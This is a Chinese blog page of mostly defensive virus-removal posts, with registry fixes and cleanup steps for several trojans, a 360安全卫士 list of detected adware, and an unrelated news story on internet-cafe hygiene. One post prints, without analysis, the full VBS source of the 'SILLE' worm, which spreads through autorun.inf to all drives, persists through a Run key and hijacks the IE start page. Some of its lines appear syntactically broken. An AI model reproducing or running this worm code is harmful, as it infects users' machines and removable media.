病毒gr80r96.dll和mx9d.sys
处理一台中病毒的电脑,使用NOD32和360安全卫士处理一番后仍留下gr80r96.dll和mx9d.sys无法清除,这两个病毒文件在NOD32中表现为:
C:\WINDOWS\system32\gr80r96.dll – Win32/BHO.NDW 木马 变种 – 无法清除。 – 已隔离 – 已删除 (在下次重启后)
C:\WINDOWS\system32\drivers\mx9d.sys – Win32/Rootkit.Agent.NCK 木马 变种 – 无法清除。 – 已隔离 – 已删除 (在下次重启后)
但是重启和安全模式下都无法清除,原来是因为病毒自动在系统的注册表的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
项中把C:\WINDOWS\system32\gr80r96.dll 加入。
进行安全模式的桌面亦会自动运行病毒文件,因此最安全的方法是使用“深山红叶”或者其他引导光盘中的Windows PE系统,跳过启动Windows。
再删除 C:\WINDOWS\system32\gr80r96.dll 和 C:\WINDOWS\system32\drivers\mx9d.sys
还没有评论.
还没有引用.
找回文件夹选项里面的"隐藏受保护的操作系统文件(推荐)"复选框
关于2年前 - 2 comments
今天在分析由d.52hxsh.com传播的弹出unqbi.qb-qq.com广告窗口的病毒时,发现这个病毒把文件夹选项里面的"隐藏受保护的操作系统文件(推荐)"复选框干掉了,这种方式不同于以往把有效的DWORD值CheckedValue删除掉,新建了一个无效的字符串值CheckedValue的手段。
出现这种现象是因为有些木马把自己的属性设置成隐藏、系统属性,并且把注册表中“文件夹选项中的隐藏受保护的操作系统文件”项和“显示所有文件和文件夹”选项删除,致使通过procexp可以在进程中看到,但去文件所在目录又找不到源文件,无法进行删除。
在仔细对比了虚拟机和正常机器上的注册表后,发现此病毒是更改了
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
中的两个项,从而把"隐藏受保护的操作系统文件(推荐)"的复选框从文件夹选项中隐藏起来了。
因此只需要导入本文提供的SuperHidden.reg附件即可解决问题。
另一附件SHOWALL.reg则是解决无法显示所有文件的注册表。
附件:superhidden.reg(1424 Byte)
附件:showall.reg(2400 Byte)
网吧键盘比公厕“脏”400倍 网吧卫生状况让人忧
关于2年前 - 没有评论
“为什么要清洗电脑?屏幕不是干净的吗?”省城红星路上一网吧老板对此不解,“电脑键盘有灰尘,我们就擦擦.”连日高温,记者走访省城部分网吧发现,不少网吧卫生状况不尽如人意,最为突出的就是室内空气污浊、上网设备污垢积存过多.而据了解,目前网吧卫生监测、检查尚属空白.
一边吃盒饭一边敲键盘
7月28日,淮河路附近一网吧内,记者刚进门,便觉胸闷.键盘按键和鼠标都非常油腻,上面还有点点黑斑,当记者对网吧卫生表示不满时,老板却不以为然,“键盘从没清洗过,也没听顾客说脏”.
记者随后又走访了宣城路、太湖西路、金寨路等地居民区、学校附近网吧,发现有的网吧座椅长期不换,椅布吸满了油污汗液;键盘、电脑桌由于没定期清洁,表面上也积满了黑色污垢.夏天一到,这些污垢无疑会滋生细菌,记者看到还有网民一边吃盒饭,一边敲键盘.
网吧卫生监管尚属盲区
记者查询目前对网吧运营有监管作用的《互联网上网服务营业场所管理条例》,发现《条例》中并无网吧卫生管理的内容.日前,有关部门接受采访时表示,“没有依据,就没有办法管,只能靠网吧自己管自己.”
《条例》中未提及网吧卫生,那是否属于卫生部门的监管范围?据合肥点击查看合肥及更多城市天气预报市卫生局卫生监督所有关负责人介绍,国家的《公共场所卫生管理条例》是1987年颁布的,当时尚无网吧出现,所以其规定管理内容中,并无“网吧”这一项.
昨天,记者随机采访了数十位市民,多数市民认为,网吧安全卫生应引起政府和社会各界关注.据了解,有关部门曾对数个网吧的200台电脑键盘进行抽样检查,发现其中存留的乙肝病毒竟然占到35%.在电脑键盘和鼠标上发现的有害细菌比公共厕所的细菌高出400倍.
这样的数据着实让不少家长惊心.在省城一食品公司上班的市民李阳明说,目前逛网吧的多为学生,希望通过监管,使网吧能让家长放心.据媒体报道,江苏省泰州市此前出台了《网吧卫生规范》,该《规范》也是在全国范围内首部针对网吧卫生的地方性条例.不仅如此,据透露,目前卫生部已着手修订《公共场所卫生管理条例》,网吧极可能被纳入监测范围,预计条例将会在今年修订完成.
原载《安徽商报》
收藏一个VBS病毒的代码(劫持IE)
关于2年前 - 没有评论
脚本病毒,出来已经有些时间了.
大部分的杀毒软件都能够发现这种病毒了.
病毒的重点部分是在这个ie.vbs文件中,其中的代码如下:
关于代码的分析留在以后再做,
VBS代码
‘virus name is SILLE
‘By Winxp32
on error resume next
dim ms,winpath,fs,fd,mf,atr,tf,rg,nt,chk,sd
atr = "[autorun]"&vbcrlf"shellexecute=wscript.exe ie.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
chk = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
ms=ms&text.readline
ms=ms & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\ie.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\ie.vbs",2,true)
tf.write ms
tf.close
set tf = fs.getfile(winpath & "\ie.vbs")
tf.attributes = 39
for each fd in fs.drives
If (fd.drivetype = 1 or fd.drivetype = 2) and fd.path <> "A:" then
set tf=fs.getfile(fd.path "\ie.vbs")
tf.attributes =32
set tf=fs.createtextfile(fd.path "\ie.vbs",2,true)
tf.write ms
tf.close
set tf=fs.getfile(fd.path "\ie.vbs")
tf.attributes =39
set tf =fs.getfile(fd.path "\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(fd.path "\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(fd.path "\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath"\ie.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","¤¤¤¤~~~—@ SILLE"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.sille.net"
if chk <> 1 then
Wscript.sleep 333333
end if
loop while chk<>1
set sd = createobject("Wscript.shell")
sd.run winpath"\explorer.exe /e,/select, "&Wscript.ScriptFullname
360Safe安全工具
关于3年前 - 没有评论
360安全卫士产品特点:
[查杀121款恶意软件]彻底摆脱乱弹广告、机器狂慢的困扰[卸载170款插件程序]仅保留需要的插件,大幅度提高系统运行效率[13000条进程知识解释]帮您准确全面的分析电脑安全状况[清理30项使用痕迹]清理使用电脑时留下的痕迹,让您踏网无痕来去无踪[查杀20万种病毒]new!内含卡巴斯基反病毒软件v6.0正式版
360安全卫士可以查杀121款恶意软件
以下为您列出我们可以查杀的恶意软件列表
序号
名称
出品公司
恶意行为
1
很棒小秘书
上海很棒信息技术有限公司
强制安装、无法彻底删除、弹出广告、自动变形
2
DMCast桌面传媒/IE-BAR
千橡
弹出广告、无法彻底删除、强制安装、浏览器劫持
3
开心运程速递插件
http://www.smartdove.com/
强制安装、无法彻底删除、弹出广告
4
InsII&III
未知
弹出广告、强制安装、无法彻底删除、自动变形
5
EliteBar
未知
弹出广告、强制安装、无法彻底删除、劫持浏览器、窃取用户隐私
6
New.net
未知
弹出广告、强制安装、无法彻底删除、自动恢复
7
TargetAD
很棒
弹出广告、强制安装、劫持浏览器、无法彻底删除
8
ADDeliverer
未知
弹出广告、劫持浏览器(篡改首页)、强制安装、无法彻底删除、
9
多多QQ表情
www.qqhelper.com
强制安装、弹出广告、无法彻底删除、自动变形
10
DmPlay弹广告软件
未知
弹出广告、强制安装、无法彻底删除
12
WinStdup
www.borlander.cn
强制安装、弹出广告、无法彻底删除、自动变形
13
MSIbm
未知
弹出广告、强制安装、无法彻底删除
14
iShare
未知
弹出广告、强制安装、无法彻底删除
15
Cnnic中文上网
中国互联网络信息中心
强制安装、无法彻底删除 、干扰其他软件运行、浏览器劫持
16
Cnnic无忧上网工具条
中国互联网络信息中心
强制安装、无法彻底删除 、干扰其他软件运行、浏览器劫持
17
网络实名
雅虎
强制安装、浏览器劫持、干扰其他软件运行、无法彻底卸载
18
百度搜索伴侣
百度
强制安装、无法测试删除、浏览器劫持
19
网络猪
中搜
强制安装、无法彻底删除、弹出广告、后台下载、干扰其他软件运行
20
windows adtools
WinRatchet
弹出广告、强制安装、记录用户行为、无法彻底删除
21
中搜地址栏搜索
中搜
浏览器劫持(修改默认搜索结果)、强制安装、无法彻底删除、干扰其他软件运行、程序自动升级
22
网络猪后台安装
中搜
强制安装、无法彻底删除、后台自动下载、浏览器劫持
23
百度超级搜霸
百度
强制安装、浏览器劫持、无法彻底删除、干扰其他软件运行
24
女生宿舍
未知
木马
25
UrlCom
未知
木马
26
Netbus
未知
远程监控、特洛伊木马
27
Trojan.Clciker.Bhoiea
未知
木马
28
博采网摘
博客中国
强制安装、无法彻底删除、弹出广告、记录用户行为
29
ISC广告插件
ISC互联网服务中心
强制安装、弹出广告、无法彻底删除
30
实用网址导航(酷站导航)
上海来网广告公司
强制安装、弹出广告、无法彻底删除
31
Deskipn桌面传媒
www.deskadtop.com
弹出广告、强制安装、无法彻底删除
32
IEHlprObj
未知
弹出广告、强制安装、无法彻底删除
33
139LOVE
未知
弹出广告、强制安装、无法彻底删除
34
SOLO99
www.solo99.com
弹出广告、强制安装、无法彻底删除、浏览器劫持
35
wz101
未知
弹出广告、强制安装、无法彻底删除
36
Hotbar
www.hotbar.com
强制安装、无法彻底删除、恶意软件共享
37
Media Access广告软件
WindUpdates
弹出广告、强制安装、无法彻底删除
38
WebMisc
天网
强制安装、弹出广告
39
ADO广告插件
未知
弹出广告、强制安装、无法彻底删除
40
WinCtlAd
WindUpdates Adware
弹出广告、强制安装、
41
iShare-MMSSender
未知
弹出广告、强制安装、无法彻底删除
42
中国共享软件嵌入式广告
未知
弹出广告、强制安装、无法彻底删除
43
enternet.exe广告软件
未知
弹出广告、强制安装、无法彻底删除
44
MyIEHelper
未知
弹出广告、无法彻底删除、强制安装
45
搜易财富火箭
www.sooe.cn
弹出广告、强制安装、无法彻底删除
46
Yayad
上海森奥旗下的雅雅广告发布平台
弹出广告、强制安装、无法彻底删除
47
U88财富快车
www.u88.cn
浏览器劫持、无法彻底删除、强制安装
48
划词搜索
中搜
强制安装、无法彻底删除
49
IE伴郎
未知
强制安装、无法彻底删除、浏览器劫持
50
31G上网直通车
未知
强制安装、无法彻底删除、浏览器劫持
51
一搜工具条
雅虎
强制安装、浏览器劫持
52
3721上网助手
3721
强制安装、浏览器劫持
53
ACCOONA 工具栏
www.accoona.cn
强制安装、浏览器劫持(修改默认搜索结果)
54
Yayad
上海森奥旗下的雅雅广告发布平台
弹出广告、强制安装、无法彻底删除
55
使用搜索
www.9991.com
浏览器劫持、强制安装
56
雅虎助手
雅虎
强制安装、干扰其他软件运行、浏览器劫持
57
QQ表情
未知
强制安装、无法彻底删除
58
LightFrame3IECOM
未知
强制安装、无法彻底删除
59
Dudu下载加速器
千橡公司
强制安装、恶意软件共享、无法彻底删除
60
17key.net Winkld
www.88dog.com
强制安装、无法彻底删除、
61
酷客娱乐平台
www.kuco.cn
强制安装、无法彻底删除、恶意软件共享、后台自动下载
62
每步直达网址
青岛每步数码科技有限公司
浏览器劫持、无法彻底删除
63
易趣购物按钮
易趣
强制安装、添加收藏夹、浏览器劫持、无法彻底删除
64
8848天下搜索
8848电子商务
无法彻底删除、浏览器劫持
65
网址极限
www.op99.com
强制安装、无法彻底删除、浏览器劫持
66
8848搜索助手
8848电子商务
浏览器劫持(修改默认搜索结果)
67
如意搜
www.ruyiso.com
浏览器劫持(修改默认搜索结果)
68
Bysoo 百搜工具条
www.bysoo.com
浏览器劫持(修改默认搜索结果)、无法彻底删除、
69
estAlive
未知
强制安装、无法彻底删除
70
surfaccuracy
www.surfaccuracy.com
弹出广告、强制安装、无法彻底删除
71
HarrySou ToolBar(哈利引擎)
www.harrysou.com
浏览器劫持(修改默认搜索结果)
72
3721下载专家
3721
强制安装
73
网络钓鱼克星
未知
强制安装、无法彻底删除
74
CopySo拷贝搜
www.copyso.com
强制安装、无法彻底删除
75
太极天下搜索
www.txia.com
强制安装、无法彻底删除
76
完美网译通
http://wyt.world2.com.cn/
强制安装、无法彻底删除
77
虎翼DIY吧
www.diybar.cn
强制安装、无法彻底删除、恶意软件共享
78
迷你PP
迅雷
强制安装
79
Router Layer
未知
强制安装、无法彻底删除
80
EyeOnIE
未知
强制安装、无法彻底删除
81
i&Bar
www.iscreen.com
强制安装
82
短信狂人
共创软件工作室
强制安装、无法彻底删除
83
阿里巴巴商务直通车
阿里巴巴
强制安装
84
娱乐心空
www.yulexk.com
强制安装、无法彻底删除
85
17lele
北京一起乐乐网络技术有限公司
强制安装
86
MyIEtoolbar
未知
强制安装、无法彻底删除
87
5kee(Do55)
未知
强制安装、无法彻底删除
88
Xbar图铃随E下
www.xbar.cn
强制安装
89
易趣购物工具条
易趣
强制安装、浏览器劫持
90
播霸/猫眼网络电视迷你版
千橡公司
强制安装、无法彻底删除
91
天天搜索/My网蜜
www.365ss.cn
强制安装、无法彻底删除
92
中国通
未知
强制安装
93
web3000
未知
弹出广告、强制安装、记录用户行为、无法彻底删除
94
小蜜蜂
www.miphone.cn
无法彻底删除
95
电鹰搜索
www.dvd88.cn
强制安装、无法彻底删除
96
NavExcel Adware
avExcel
记录用户浏览习惯、弹出广告
97
访问加速
每步数码
强制安装、无法彻底删除
98
彩秀
www.caishow.com
强制安装、用户行为记录
99
DTSVC
未知
强制安装、无法彻底删除
100
风雷影音搜索
风雷工作室
强制安装,浏览器劫持
101
3721搜索助手
3721
强制安装
102
快搜
www.kuaiso.com
强制安装、浏览器劫持
103
易虎
北京易虎信息技术有限公司
强制安装、无法彻底删除
104
vvsetup
未知
强制安装、无法彻底删除
105
CpapView广告插件
未知
恶意插件、弹出广告、强制安装、无法彻底删除
106
AdvSC32广告插件
未知
恶意插件、弹出广告、强制安装、无法彻底删除
107
WinSC广告插件
未知
恶意插件、弹出广告、强制安装、无法彻底删除
108
syscast
未知
强制安装、无法彻底删除
109
lsass 木马
未知
强制安装、无法彻底删除、记录用户行为
110
HyperBar
未知
弹出广告、强制安装、无法彻底删除
111
Msq木马
未知
木马
112
spoolsv
广州傲讯信息科技有限公司
弹出广告、强制安装、无法彻底删除
113
BrowserHelper Classe
未知
强制安装、无法彻底删除
114
IEXPLORER木马
未知
木马
115
娱乐助手
未知
强制安装、无法彻底删除
116
iexpress.dll恶意插件
未知
强制安装
117
酷桌面
未知
强制安装、无法彻底删除
118
webacc插件
未知
强制安装、无法彻底删除
119
NetAccelerate恶意插件
未知
强制安装、无法彻底删除、弹出广告
120
systems
未知
强制安装、无法彻底删除
121
wincup
www.borlander.cn
弹出广告、强制安装、无法彻底删除
被一个WOW木马强奸了
关于3年前 - 没有评论
怎样用REG文件删除注册表项其实很简单,我们来举个例子。先在注册表的HKEY_CURRENT_USER根键下建立一个名为“Test”的子键,然后在子键下建立一个名为“Test1”的键值。然后我们建立一个REG文件,输入以下内容:REGEDIT4[HKEY_CURRENT_USER\Test]"Test1"=-以上的文件就可以删除键值“Test1”。如果我们要删除“Test”子键,那么我们的REG文件就应该输入以下内容:REGEDIT4[-HKEY_CURRENT_USER\Test]
这是一个WOW木马,最近好像中招的人多起来了,这个小木马除了和一般的小木马一样会建立自启动项、关联文件外,它还会修改很多其它关联信息,增加了病毒被激活的机率,也给清除带来了一点点麻烦。 在病毒文件没有删除之前所做的一些操作可能会调用激活病毒程序,所以在以下1和2步之间请尽量不要做多余的其它操作。顺利地删除病毒文件需要一点点技巧,在处理过程中慢慢体会吧……
注:可用本站下载的木马杀客,来杀除病毒。之后再手工删除以下文件 1. 结束病毒的进程%Windows%\smss.exe(用木马杀客系统进程可以结束) 2. 删除相关文件: C:\MSCONFIG.SYS %Windows%\1.com %Windows%\ExERoute.exe %Windows%\explorer.com %Windows%\finder.com %Windows%\smss.exe %Windows%\Debug\DebugProgram.exe %System%\command.pif %System%\dxdiag.com %System%\finder.com %System%\MSCONFIG.COM %System%\regedit.com %System%\rundll32.com %ProgramFiles%\Internet Explorer\iexplore.com %ProgramFiles%\Common Files\iexplore.pif 3. 恢复EXE文件关联 删除[HKEY_CLASSES_ROOT\winfiles]项 4. 删除病毒启动项: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Torjan Program"="%Windows%\smss.exe" 修改[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]下 "shell"="Explorer.exe 1" 为 "shell"="Explorer.exe" 5. 恢复病毒修改的注册表信息: (1)分别查找“command.pif”、“finder.com”、“rundll32.com”的信息,将“command.pif”、“finder.com”、“rundll32.com”修改为“rundll32.exe” (2)查找“explorer.com”的信息,将“explorer.com”修改为“explorer.exe” (3)查找“iexplore.com”的信息,将“iexplore.com”修改为“iexplore.exe” (4)查找“iexplore.pif”的信息,将找到的“%ProgramFiles%\Common Files\iexplore.pif”修改为“%ProgramFiles%\Internet Explorer\iexplore.exe” 6 在command模式下写入assoc .exe=exefile修复exe关联,这样exe文件才可以打的开
7 在本站下载木马杀客,来修复exe文件
再遇病毒,Copy.exe
关于3年前 - 1 评论
当然不是我变态啊,只是自己有点喜欢杀毒后的快感. 病毒是随着电脑技术成长起来的,可以说如果没有病毒,那么就没有当前这么发达的技术. 而我的电脑技术也是在和病毒的斗争中长进的.这些日子在搞毕业设计,常去打印文章结果不小心就中毒了.不过还好这个东西没有破坏系统,要不我又要汗一下了.居然被蛇咬了.每个盘都被设成了自动播放.卡巴也报警了. 我也不是省油的灯啊.
在文件夹选项里打开显示所以文件和系统文件.就看到了每个盘下有三个文件:atuorun.ini,copy.exe,host.exe再看一下进程:有三个可疑的进程.c:\windows\system32\temp1.exec:\windows\system32\temp2.exec:\windows\svchost.exe
这样下来基本就可以确定这个病毒是怎么运行的了啊.先干掉上面的那三个进程,找到它们再删除,然后删掉每个盘下的那三个文件,不过要注意的是不要双击打开磁盘啊,要右键再点打开,要不又会生成系统盘下的那些文件啊.之后,Regedit打开注册表,查找"c:\windows\svchost.exe",删除所有找到的项目,再查找"copy.exe"同样也全部删除.
重启电脑,一切又OK了.
经验:关闭"磁盘的自动运行(在组策略里关掉)",不要双击打开U盘.